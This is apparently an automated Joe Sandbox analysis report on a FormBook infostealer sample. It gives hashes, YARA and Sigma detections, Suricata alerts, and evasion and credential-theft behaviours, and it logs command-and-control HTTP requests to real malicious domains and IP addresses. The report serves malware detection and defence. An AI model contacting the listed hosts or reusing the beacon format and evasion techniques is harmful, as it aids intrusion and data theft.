Edit tour

Windows Analysis Report
WBI835q8qr.exe

Overview

General Information

Sample name:	WBI835q8qr.exe renamed because original name is a hash value
Original sample name:	075cbf8b84def7244b1e0b5e759b7ac367a015c40a2d127c730cfb5f39c5a040.exe
Analysis ID:	1588679
MD5:	eb30426f7e258e040ada0dafdfabaef8
SHA1:	6c759779d47c2e69a14accbc07cb252f1a1a39b7
SHA256:	075cbf8b84def7244b1e0b5e759b7ac367a015c40a2d127c730cfb5f39c5a040
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

WBI835q8qr.exe (PID: 4628 cmdline: "C:\Users\user\Desktop\WBI835q8qr.exe" MD5: EB30426F7E258E040ADA0DAFDFABAEF8)

svchost.exe (PID: 5216 cmdline: "C:\Users\user\Desktop\WBI835q8qr.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

zERAQEwgaCWL.exe (PID: 4612 cmdline: "C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

netbtugc.exe (PID: 5272 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)

zERAQEwgaCWL.exe (PID: 2040 cmdline: "C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6896 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.3856343827.0000000003090000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3856343827.0000000003090000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3848509513.0000000000CA0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3848509513.0000000000CA0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1567281464.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1567281464.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.3855901361.0000000003240000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3855901361.0000000003240000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d9277:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2c2916:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.3859655082.0000000004E10000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3859655082.0000000004E10000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x8c4b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x75b52:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3856117631.0000000003050000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3856117631.0000000003050000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1568187338.0000000003E00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1568187338.0000000003E00000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d9277:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2c2916:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1567707213.00000000035B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1567707213.00000000035B0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\WBI835q8qr.exe", CommandLine: "C:\Users\user\Desktop\WBI835q8qr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\WBI835q8qr.exe", ParentImage: C:\Users\user\Desktop\WBI835q8qr.exe, ParentProcessId: 4628, ParentProcessName: WBI835q8qr.exe, ProcessCommandLine: "C:\Users\user\Desktop\WBI835q8qr.exe", ProcessId: 5216, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\WBI835q8qr.exe", CommandLine: "C:\Users\user\Desktop\WBI835q8qr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\WBI835q8qr.exe", ParentImage: C:\Users\user\Desktop\WBI835q8qr.exe, ParentProcessId: 4628, ParentProcessName: WBI835q8qr.exe, ProcessCommandLine: "C:\Users\user\Desktop\WBI835q8qr.exe", ProcessId: 5216, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T04:05:56.591038+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49709	154.215.72.110	80	TCP
2025-01-11T04:06:28.680559+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49714	116.50.37.244	80	TCP
2025-01-11T04:07:50.316021+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49718	85.159.66.93	80	TCP
2025-01-11T04:08:03.688903+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49722	91.195.240.94	80	TCP
2025-01-11T04:08:25.100415+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49726	66.29.149.46	80	TCP
2025-01-11T04:08:38.475364+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49730	195.110.124.133	80	TCP
2025-01-11T04:09:07.959719+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49734	217.196.55.202	80	TCP
2025-01-11T04:09:50.449422+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49735	154.215.72.110	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.goldenjade-travel.com/fo8o/?7Fp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ==&HN4=EPU0u4nHA	Avira URL Cloud: Label: malware
Source: http://www.rssnewscast.com/fo8o/?7Fp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&HN4=EPU0u4nHA	Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?7Fp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ==&HN4=EPU0u4nHA	Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: WBI835q8qr.exe	Virustotal: Detection: 69%			Perma Link
Source: WBI835q8qr.exe	ReversingLabs: Detection: 73%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3856343827.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3848509513.0000000000CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1567281464.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3855901361.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3859655082.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3856117631.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1568187338.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1567707213.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: WBI835q8qr.exe

Joe Sandbox ML: detected

Source: WBI835q8qr.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zERAQEwgaCWL.exe, 00000003.00000000.1493011603.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, zERAQEwgaCWL.exe, 00000008.00000000.1636664738.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: WBI835q8qr.exe, 00000000.00000003.1415477340.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, WBI835q8qr.exe, 00000000.00000003.1414963291.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1476278405.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1567745007.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1567745007.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1478027520.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857297581.0000000003440000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1570359057.0000000003293000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857297581.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1567667691.00000000030E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: WBI835q8qr.exe, 00000000.00000003.1415477340.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, WBI835q8qr.exe, 00000000.00000003.1414963291.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1476278405.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1567745007.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1567745007.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1478027520.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.3857297581.0000000003440000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1570359057.0000000003293000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857297581.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1567667691.00000000030E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1567446257.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1536464194.000000000301A000.00000004.00000020.00020000.00000000.sdmp, zERAQEwgaCWL.exe, 00000003.00000003.1507157555.00000000016C5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3849311944.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3859184553.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000002.3857301364.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1856880731.00000000395FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3849311944.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3859184553.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000002.3857301364.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1856880731.00000000395FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1567446257.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1536464194.000000000301A000.00000004.00000020.00020000.00000000.sdmp, zERAQEwgaCWL.exe, 00000003.00000003.1507157555.00000000016C5000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B8445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B8445A
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B8C6D1 FindFirstFileW,FindClose,	0_2_00B8C6D1
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B8C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B8C75C
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B8EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B8EF95
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B8F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B8F0F2
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B8F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B8F3F3
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B837EF
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B83B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B83B12
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B8BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B8BCBC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CBBAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_00CBBAB0

Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then xor eax, eax	4_2_00CA9480
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then pop edi	4_2_00CADD45
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_0328053E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49718 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49726 -> 66.29.149.46:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49709 -> 154.215.72.110:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49722 -> 91.195.240.94:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49734 -> 217.196.55.202:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49735 -> 154.215.72.110:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49714 -> 116.50.37.244:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49730 -> 195.110.124.133:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.joyesi.xyz

Source: Joe Sandbox View	IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View	IP Address: 154.215.72.110 154.215.72.110

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B922EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00B922EE

Source: global traffic	HTTP traffic detected: GET /fo8o/?7Fp=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g==&HN4=EPU0u4nHA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?7Fp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ==&HN4=EPU0u4nHA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?7Fp=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA==&HN4=EPU0u4nHA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?7Fp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&HN4=EPU0u4nHA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?7Fp=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd68f41LHWk1tWVOcLO2B4JSrTHSWnbApQ5HDH0jFdh0bEA==&HN4=EPU0u4nHA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?7Fp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ==&HN4=EPU0u4nHA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
